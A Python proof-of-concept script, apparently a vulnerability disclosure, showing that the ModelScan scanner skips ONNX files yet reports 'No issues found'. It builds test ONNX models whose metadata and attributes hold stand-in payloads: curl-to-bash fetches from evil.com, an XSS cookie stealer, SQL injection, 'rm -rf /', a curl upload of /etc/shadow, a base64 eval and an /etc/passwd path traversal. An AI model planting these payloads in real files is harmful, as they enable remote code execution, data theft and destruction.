onnx-modelscan-gap-poc / poc_modelscan_onnx_gap.py

Upload poc_modelscan_onnx_gap.py with huggingface_hub

0b6c068 verified 3 months ago

12.3 kB

	#!/usr/bin/env python3
	"""
	ModelScan ONNX Scanning Gap PoC

	VULNERABILITY:
	ModelScan (by ProtectAI) claims to scan ML model files for security issues.
	However, it completely SKIPS all ONNX model files. When pointed at an ONNX
	file, ModelScan reports "No issues found!" while simultaneously noting in
	fine print that the file was "skipped" and "not scanned."

	This means any ONNX model -- regardless of how malicious -- passes ModelScan
	with a clean bill of health.

	IMPACT:
	- ONNX models can contain custom operator implementations that reference
	attacker-controlled shared libraries (.so/.dll)
	- ONNX models can reference external data files via relative paths,
	enabling path traversal attacks (e.g. ../../../etc/passwd)
	- ONNX models can embed arbitrary strings in metadata and operator attributes
	(shell commands, Python code, injection payloads)
	- ONNX Runtime custom ops can execute arbitrary native code at inference time
	- ModelScan reports ALL of these as clean, giving false confidence
	- Users who rely on ModelScan to vet ONNX files before loading them get
	zero protection

	AFFECTED:
	- modelscan 0.8.7 (latest as of 2026-02-16)
	- All ONNX model files are completely unscanned

	TESTED: modelscan 0.8.7, onnx 1.20.1, Python 3.12

	Usage:
	python3 poc_modelscan_onnx_gap.py
	"""

	import os
	import sys
	import subprocess

	try:
	import onnx
	from onnx import TensorProto, helper
	HAS_ONNX = True
	except ImportError:
	HAS_ONNX = False
	print("[!] WARNING: onnx package not installed. Install with: pip install onnx")
	sys.exit(1)

	# Use the correct modelscan path
	MODELSCAN_BIN = os.path.expanduser("~/.local/bin/modelscan")
	if not os.path.exists(MODELSCAN_BIN):
	# Try system PATH
	import shutil
	MODELSCAN_BIN = shutil.which("modelscan") or "modelscan"


	def create_simple_onnx_model(output_path):
	"""Create a simple, legitimate ONNX model (baseline)."""
	X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
	Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
	identity_node = helper.make_node("Identity", inputs=["X"], outputs=["Y"])
	graph = helper.make_graph([identity_node], "simple_graph", [X], [Y])
	model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
	model.doc_string = "A simple identity model"
	onnx.save(model, output_path)
	print(" Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))


	def create_suspicious_custom_op_model(output_path):
	"""
	Create an ONNX model with a custom operator from an attacker domain.
	Custom ops require loading external shared libraries at runtime.
	The operator attribute contains an explicit shell command string.
	"""
	X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
	Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])

	custom_node = helper.make_node(
	"MaliciousTransform",
	inputs=["X"],
	outputs=["Y"],
	domain="com.attacker.evil_ops",
	name="evil_custom_op",
	)
	custom_node.attribute.append(
	helper.make_attribute("shell_cmd", "curl http://evil.com/payload \| bash")
	)

	graph = helper.make_graph([custom_node], "custom_op_graph", [X], [Y])
	model = helper.make_model(
	graph,
	opset_imports=[
	helper.make_opsetid("", 13),
	helper.make_opsetid("com.attacker.evil_ops", 1),
	],
	)
	model.doc_string = "Model with custom operator that could load malicious shared library"

	entry = model.metadata_props.add()
	entry.key = "loader_script"
	entry.value = "import os; os.system('curl http://evil.com/shell.sh \| bash')"

	onnx.save(model, output_path)
	print(" Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))


	def create_external_data_traversal_model(output_path):
	"""
	Create an ONNX model that references external data via path traversal.
	The model's weight tensor points to ../../../etc/passwd as its data source.
	"""
	X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
	Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])

	weight_tensor = helper.make_tensor(
	"weights", TensorProto.FLOAT, [5, 5],
	[float(i) for i in range(25)]
	)
	matmul_node = helper.make_node("MatMul", inputs=["X", "weights"], outputs=["Y"])
	graph = helper.make_graph(
	[matmul_node], "external_data_graph", [X], [Y],
	initializer=[weight_tensor],
	)
	model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])

	for init in model.graph.initializer:
	if init.name == "weights":
	init.data_location = TensorProto.EXTERNAL
	ext_info = init.external_data.add()
	ext_info.key = "location"
	ext_info.value = "../../../etc/passwd"
	ext_info2 = init.external_data.add()
	ext_info2.key = "offset"
	ext_info2.value = "0"
	ext_info3 = init.external_data.add()
	ext_info3.key = "length"
	ext_info3.value = "100"
	init.ClearField("float_data")
	init.ClearField("raw_data")
	break

	onnx.save(model, output_path)
	print(" Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))


	def create_metadata_injection_model(output_path):
	"""
	Create an ONNX model with code injection payloads in metadata fields.
	Includes XSS, SQL injection, Python RCE, and base64-encoded exec.
	"""
	X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
	Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
	node = helper.make_node("Identity", inputs=["X"], outputs=["Y"])
	graph = helper.make_graph([node], "metadata_graph", [X], [Y])
	model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])

	payloads = {
	"description": "<script>fetch('http://evil.com/steal?cookie='+document.cookie)</script>",
	"author": "'; DROP TABLE models; --",
	"license": "__import__('os').system('rm -rf /')",
	"post_load_hook": "import subprocess; subprocess.run(['curl', 'http://evil.com/exfil', '-d', '@/etc/shadow'])",
	}
	for key, value in payloads.items():
	entry = model.metadata_props.add()
	entry.key = key
	entry.value = value

	model.doc_string = "eval(__import__('base64').b64decode('aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2lkJyk='))"
	onnx.save(model, output_path)
	print(" Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))


	def run_modelscan(model_path, label):
	"""Run modelscan CLI on a model file and return parsed results."""
	print("\n --- ModelScan on: {} ---".format(label))

	try:
	env = os.environ.copy()
	env["PATH"] = os.path.expanduser("~/.local/bin") + ":" + env.get("PATH", "")
	result = subprocess.run(
	[MODELSCAN_BIN, "scan", "-p", model_path, "--show-skipped"],
	capture_output=True, text=True, timeout=60, env=env,
	)
	output = result.stdout + result.stderr

	# Filter out TF/CUDA noise
	lines = []
	for line in output.split("\n"):
	if any(skip in line for skip in [
	"cuda", "CUDA", "TensorFlow binary", "To enable",
	"settings file detected", "cpu_feature_guard",
	]):
	continue
	lines.append(line)
	clean_output = "\n".join(lines).strip()

	# Print the key parts
	for line in clean_output.split("\n"):
	stripped = line.strip()
	if stripped:
	print(" \| {}".format(stripped))

	# Parse results
	skipped = "skipped" in output.lower() and "did not scan" in output.lower()
	no_issues = "No issues found" in output
	issues_count = 0
	if "Total Issues:" in output:
	for line in output.split("\n"):
	if "Total Issues:" in line:
	try:
	issues_count = int(line.split(":")[-1].strip())
	except ValueError:
	pass

	return {
	"scanned": not skipped,
	"issues_found": issues_count,
	"no_issues_reported": no_issues,
	"skipped": skipped,
	}
	except FileNotFoundError:
	print(" ERROR: modelscan binary not found at {}".format(MODELSCAN_BIN))
	return {"scanned": False, "issues_found": 0, "no_issues_reported": False, "skipped": True}
	except subprocess.TimeoutExpired:
	print(" ERROR: Timed out")
	return {"scanned": False, "issues_found": 0, "no_issues_reported": False, "skipped": True}


	def main():
	print("=" * 70)
	print("ModelScan ONNX Scanning Gap PoC")
	print("=" * 70)
	print()
	print("modelscan binary: {}".format(MODELSCAN_BIN))

	script_dir = os.path.dirname(os.path.abspath(__file__))
	models_dir = os.path.join(script_dir, "models")
	os.makedirs(models_dir, exist_ok=True)

	# Create test models
	models = []

	print("\n[*] Creating test ONNX models...")

	print("\n 1. Simple legitimate model (baseline):")
	p = os.path.join(models_dir, "simple_identity.onnx")
	create_simple_onnx_model(p)
	models.append(("simple_identity.onnx (clean baseline)", p))

	print("\n 2. Custom operator with shell command attribute:")
	p = os.path.join(models_dir, "custom_op_suspicious.onnx")
	create_suspicious_custom_op_model(p)
	models.append(("custom_op_suspicious.onnx (shell_cmd in attacker domain)", p))

	print("\n 3. External data with path traversal:")
	p = os.path.join(models_dir, "external_data_traversal.onnx")
	create_external_data_traversal_model(p)
	models.append(("external_data_traversal.onnx (../../../etc/passwd)", p))

	print("\n 4. Metadata injection payloads:")
	p = os.path.join(models_dir, "metadata_injection.onnx")
	create_metadata_injection_model(p)
	models.append(("metadata_injection.onnx (XSS + SQLi + RCE + b64 exec)", p))

	# Scan each model
	print("\n" + "=" * 70)
	print("[*] Running ModelScan on each model...")
	results = []
	for label, path in models:
	r = run_modelscan(path, label)
	results.append((label, r))

	# Summary
	print("\n" + "=" * 70)
	print("RESULTS SUMMARY:")
	print("-" * 70)

	all_skipped = True
	all_no_issues = True
	for label, r in results:
	if r["skipped"]:
	status = "SKIPPED (not scanned) but reported 'No issues found'"
	elif r["no_issues_reported"]:
	status = "NO ISSUES FOUND"
	elif r["issues_found"] > 0:
	status = "ISSUES FOUND: {}".format(r["issues_found"])
	all_no_issues = False
	else:
	status = "UNKNOWN"

	if not r["skipped"]:
	all_skipped = False

	print(" {} => {}".format(label, status))

	print()
	if all_skipped:
	print("VULNERABILITY CONFIRMED: ModelScan SKIPS all ONNX files entirely.")
	print("It reports 'No issues found!' while the --show-skipped output reveals")
	print("'Model Scan did not scan file' for every single ONNX model.")
	print()
	print("This means ModelScan provides ZERO security coverage for ONNX models:")
	print(" - Custom operators from attacker-controlled domains: NOT SCANNED")
	print(" - Shell command strings in operator attributes: NOT SCANNED")
	print(" - Path traversal in external data references: NOT SCANNED")
	print(" - Code injection payloads in metadata: NOT SCANNED")
	print(" - base64-encoded Python exec in doc_string: NOT SCANNED")
	print()
	print("The 'No issues found!' message creates a false sense of security.")
	print("Users trust ModelScan to protect them from malicious models, but")
	print("ONNX -- one of the most widely used ML formats -- is completely blind.")
	elif all_no_issues:
	print("CONFIRMED: ModelScan reports no issues for all ONNX models.")
	else:
	print("ModelScan detected some issues. Review output above.")

	print("=" * 70)


	if __name__ == "__main__":
	main()